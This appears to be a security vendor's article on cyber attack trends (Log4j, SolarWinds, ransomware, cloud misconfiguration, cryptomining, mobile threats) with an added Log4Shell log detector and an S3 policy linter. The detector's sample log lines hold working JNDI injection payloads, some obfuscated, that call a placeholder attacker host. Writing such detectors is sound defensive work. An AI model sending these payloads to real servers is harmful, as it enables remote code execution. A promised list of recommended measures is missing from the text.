A cyber attack is an assault launched by cybercriminals, using one or more computers, against one or more computers or networks. A cyber attack can maliciously disable computers, steal data, or use a breached computer as a launch point for further attacks. Cybercriminals use a variety of methods to launch a cyber attack, including malware, phishing, ransomware and denial of service.
Check Point Research (CPR) has released information on cyber attacks seen in the context of the ongoing Russia-Ukraine conflict. In the first three days of fighting, cyber attacks on Ukraine’s government and military sector increased by 196%. The number of cyber attacks on Russian businesses climbed by 4%.
Phishing emails in East Slavic languages grew sevenfold, with a third of those malicious phishing emails being sent from Ukrainian email addresses to Russian receivers.
A severe remote code execution (RCE) vulnerability in the Apache logging package Log4j 2, versions 2.14.1 and below, was reported on December 9th 2021 (CVE-2021-44228). With over 400,000 downloads from its GitHub repository, Apache Log4j is the most popular Java logging package. It is used by a large number of enterprises throughout the world and provides logging for a variety of popular applications. The flaw is triggered when an attacker-controlled string containing a JNDI lookup (for example, placed in an HTTP header that the application logs) is written to a log, which causes the library to fetch and load a remote object. The flaw is easy to exploit and allows threat actors to take control of Java-based web servers and perform remote code execution attacks.
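The lookup string that makes the flaw exploitable is also what defenders hunt for in request logs. The detector below is an added example written for this article, not code from Check Point or the Apache Log4j project. It collapses the obfuscation tricks seen in the wild (`${lower:j}`, `${::-j}`, `${env:X:-j}`, URL encoding) the way Log4j’s lookup resolver would before matching on `${jndi:`, and reports any lookup it cannot resolve as suspicious rather than silently passing it. The sample log lines are constructed; the IP addresses and attacker.example host are placeholders.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup: a body that itself contains no "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The resolved payload we are looking for, e.g. ${jndi:ldap://...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup that still has another lookup nested inside it after normalization.
_NESTED = re.compile(r"\$\{[^}]*\$\{")


def _resolve(match: "re.Match[str]") -> str:
    """Evaluate one innermost lookup the way Log4j 2 would, for the few
    lookup types attackers use purely to hide the word "jndi"."""
    body = match.group(1)
    if body.lstrip().lower().startswith("jndi:"):
        return match.group(0)                # keep the payload intact for the final check
    if ":-" in body:                         # ${prefix:key:-default} -> "default" when key is undefined
        return body.split(":-", 1)[1]        # covers ${::-j} and ${env:NoSuchVar:-j}
    prefix, sep, value = body.partition(":")
    if sep and prefix.lower() == "lower":
        return value.lower()
    if sep and prefix.lower() == "upper":
        return value.upper()
    return match.group(0)                    # env/sys/date/...: not evaluable offline, keep as-is


def normalize_lookups(text: str, max_rounds: int = 16) -> str:
    """URL-decode once, then repeatedly collapse innermost lookups until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = _INNER.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def classify(line: str) -> str:
    """'jndi' for a confirmed JNDI lookup, 'nested-lookup' for a lookup that could
    not be fully resolved (still suspicious in user-supplied input), else 'clean'."""
    norm = normalize_lookups(line)
    if _JNDI.search(norm):
        return "jndi"
    if _NESTED.search(norm):
        return "nested-lookup"
    return "clean"


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, verdict) for every line that is not clean."""
    results = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict != "clean":
            results.append((number, verdict))
    return results


# Constructed sample access-log lines (not real traffic). The User-Agent field
# is a typical carrier for a Log4Shell probe because it is routinely logged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NoSuchVar:-j}ndi:dns://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${date:x}ndi:ldap://attacker.example/a}"',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: {verdict}")
```

Matching on the literal text `${jndi:` alone misses lines 3 to 7 above; resolving the lookups first is what makes the signature hold up. The last line shows the conservative branch: a `${date:...}` lookup cannot be evaluated offline, so the nested structure is reported for review instead of being treated as clean.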
The world is now facing what seems to be a 5th generation cyber attack: a sophisticated, multi-vector attack with the clear characteristics of a cyber pandemic. Researchers named it Sunburst, and we believe it is one of the most sophisticated and severe attacks ever seen. The attack has been reported to impact major US government offices as well as many private sector organizations.
This series of attacks was made possible when hackers were able to embed a backdoor into SolarWinds software updates. Over 18,000 companies and government offices downloaded what seemed to be a regular software update onto their computers but was actually a Trojan horse. By leveraging the common IT practice of applying software updates, the attackers used the backdoor to compromise the organizations’ assets, enabling them to spy on the organizations and access their data. For more information visit our Sunburst attack hub.
Ransomware is resurging. Small local and state government agencies, mainly in the southeastern U.S., have been victimized. Digital transformation is eroding traditional network perimeters through the adoption of cloud computing, cloud-based subscription services, and the ubiquity of mobile devices. This expansion of vectors means more ways to attack an organization.
In Q3 2020, Check Point Research saw a 50% increase in the daily average of ransomware attacks compared to the first half of the year. Organizations worldwide were under a massive wave of ransomware attacks, with healthcare the most targeted industry.
As these attacks continue to mature in both frequency and intensity, their impact on business has grown sharply. The top ransomware types were Maze and Ryuk.
Cyber threats of generation V and VI are now a reality for businesses. Cybercriminals are aware of recent advancements in company cybersecurity and have adapted their attacks to circumvent and defeat traditional safeguards. To avoid detection, modern cyber attacks are multi-vectored and use polymorphic code. As a result, detecting and responding to threats is more challenging than ever.
Cybercriminals’ primary target and an organization’s first line of defense in the remote work world is the endpoint. Securing the remote workforce necessitates an understanding of the most common cyber risks that employees experience, as well as endpoint security solutions capable of detecting, preventing, and resolving these assaults.
Cyber attacks come in a variety of different forms. Cybercriminals use many different methods to gain initial access, including malware, phishing, and exploitation of compromised credentials. From this initial access, cybercriminals can go on to achieve different objectives, including malware infection, ransomware, denial of service, data theft, and more.
In its mid-year report, Check Point Research provides analysis of the first half of 2021, looking at global cyber attack trends in malware overall, ransomware, and mobile and cloud malware.
Trend #1: Software supply chain attacks on the rise
In software supply chain attacks, the threat actor typically installs malicious code into legitimate software by modifying and infecting one of the building blocks the software relies upon. As with physical chains, software supply chains are only as strong as their weakest link.
Software supply chain attacks can be divided into two main categories. The first includes targeted attacks aiming to compromise well-defined targets, scanning their suppliers’ lists in search of the weakest link through which to enter. For example, the SolarWinds hack described above provided attackers with a path into many large and high-profile organizations.
In the second category, software supply chains are used to compromise as many victims as possible by locating a weak link with a large distribution radius. An example of such an attack is the Kaseya hack, in which cybercriminals exploited software used by Managed Service Providers (MSPs) to gain access to their customers’ networks.
Trend #2: Ransomware attacks are not going away
Ransomware has become a top-of-mind cybersecurity concern for many organizations in recent years. This malware places corporate data and operations at risk and carries a high price tag for recovery.
The widespread success of these attacks has driven growth and innovation in the ransomware industry. As long as ransomware attacks continue to be highly profitable, ransomware operators will continue to refine their techniques and malware and carry out their attacks.
Trend #3: Clouds under attack
The growing popularity of public cloud environments has led to an increase in cyber attacks targeting resources and sensitive data residing within these platforms. Misconfiguration and poor management of cloud resources remain the most prominent threat to the cloud ecosystem and were one of the main causes of a vast number of data theft incidents and attacks experienced by organizations worldwide.
Cloud cryptomining campaigns have increased, with upgraded techniques capable of evading basic cloud security products. Exposed Docker hosts have been taken over, and competing cryptomining campaigns operating in the cloud have been shut down by rivals. Check Point researchers also witnessed an increase in the number of exploitation attempts against public cloud infrastructure.
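The misconfigurations behind most of the data-theft incidents mentioned in this trend are usually a permissive resource policy rather than an exploit. As an added example (not Check Point’s code or any AWS tool), the following linter flags S3 bucket policy statements that grant access to a wildcard principal, showing a weak policy beside a corrected one. The bucket name, VPC endpoint ID, account ID and role name are invented placeholders.

```python
import json
from typing import Any, Dict, List


def _as_list(value: Any) -> List[Any]:
    """IAM policy elements may be a scalar or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def _principals(stmt: Dict[str, Any]) -> List[str]:
    """Flatten the Principal element: "*", {"AWS": "*"}, {"AWS": [...]}, ..."""
    principal = stmt.get("Principal")
    if principal is None:
        return []
    if isinstance(principal, str):
        return [principal]
    flattened: List[str] = []
    for value in principal.values():
        flattened.extend(_as_list(value))
    return flattened


def public_statements(policy: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return one finding per Allow statement reachable by an unrestricted principal.

    severity "high":   wildcard principal and no Condition (anonymous access), or
                       Allow with NotPrincipal (everyone except the listed principals)
    severity "medium": wildcard principal scoped only by a Condition (for example
                       aws:SourceVpce or aws:PrincipalOrgID); the condition needs review
    """
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue                             # Deny statements can only narrow access
        sid = stmt.get("Sid", "<no Sid>")
        actions = _as_list(stmt.get("Action", []))
        if "NotPrincipal" in stmt:
            findings.append({"sid": sid, "severity": "high", "actions": actions,
                             "reason": "Allow with NotPrincipal"})
            continue
        if "*" not in _principals(stmt):
            continue
        if stmt.get("Condition"):
            findings.append({"sid": sid, "severity": "medium", "actions": actions,
                             "reason": "wildcard principal limited only by Condition"})
        else:
            findings.append({"sid": sid, "severity": "high", "actions": actions,
                             "reason": "wildcard principal with no Condition"})
    return findings


# Constructed weak policy: anonymous read of every object, plus a wildcard grant
# that relies entirely on a VPC endpoint condition (hypothetical endpoint ID).
WEAK_BUCKET_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-reports/*"},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:GetObject", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::example-reports", "arn:aws:s3:::example-reports/*"],
     "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}}
  ]
}
""")

# Corrected policy: grant to one named role (hypothetical account and role), and
# a Deny for plaintext transport; a wildcard in a Deny is not a public grant.
FIXED_BUCKET_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "AppReaderOnly", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-reports/*"},
    {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
     "Action": "s3:*",
     "Resource": ["arn:aws:s3:::example-reports", "arn:aws:s3:::example-reports/*"],
     "Condition": {"Bool": {"aws:SecureTransport": "false"}}}
  ]
}
""")

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_BUCKET_POLICY), ("fixed", FIXED_BUCKET_POLICY)):
        for finding in public_statements(policy):
            print(f"{name}: {finding['sid']} [{finding['severity']}] {finding['reason']}")
```

Run this over every bucket policy exported from an account before trusting a “no public buckets” claim; the medium findings are the ones most often waved through, because a wildcard principal behind a condition is still reachable by anyone who satisfies that condition.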
Trend #4: Cryptominers waste corporate resources
Cryptomining or cryptojacking malware is designed to perform cryptocurrency “mining” on infected machines. This mining consumes power and CPU resources to find valid blocks for the blockchain and make money for the attacker.
The popularity of cryptomining malware ebbs and flows, but it is currently making a resurgence. The recent craze around non-fungible tokens (NFTs), which provide ownership of digital assets, has created opportunities for cybercriminals. Fake airdrops claiming to distribute free NFTs actually distribute cryptomining malware to victims’ machines.
Trend #5: Mobile device attacks
The COVID-19 pandemic drove a massive surge in mobile device usage as remote work increased dramatically. As mobile devices became central to business operations, they also gained the attention of cybercriminals.
In 2021, 46% of organizations had an incident in which a malicious mobile app was downloaded to a corporate device. The growing threat of mobile malware as well as a surge in phishing attacks targeting mobile device users (via SMS, email, etc.) has created security risks for nearly all organizations.
Despite the prevalence of cyber attacks, Check Point data suggests that 99 percent of enterprises are not effectively protected. However, a cyber attack is preventable. The key to cyber defense is an end-to-end cyber security architecture that is multilayered and spans all networks, endpoints, mobile devices, and cloud. With the right architecture, you can consolidate management of multiple security layers and control policy through a single pane of glass. This lets you correlate events across all network environments, cloud services, and mobile infrastructure.
In addition to architecture, Check Point recommends these key measures to prevent cyber attacks:
Learn more about recent cyber attack trends by checking out Check Point’s 2021 Mid-Year Cyber Security Report. You’re also welcome to learn how to protect against modern cyber threats by signing up for a free demo of Check Point Harmony Endpoint.